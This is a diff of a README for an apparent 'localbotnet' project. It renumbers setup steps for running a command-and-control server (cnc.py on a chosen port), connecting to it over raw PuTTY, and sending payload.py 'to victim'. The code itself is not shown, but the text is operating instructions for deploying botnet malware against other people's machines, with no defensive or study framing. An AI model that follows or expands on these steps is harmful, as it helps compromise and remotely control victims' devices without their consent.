kashy01/localbotnet/README.md

 # 3. Run cnc.py with port (eg. python3 cnc.py 909) on client device.

+# 4. Connect cnc server putty raw connect your ip and port.

-# 4. Send the payload.py to victim
+# 5. Send the payload.py to victim

 # Remember to shutdown !!!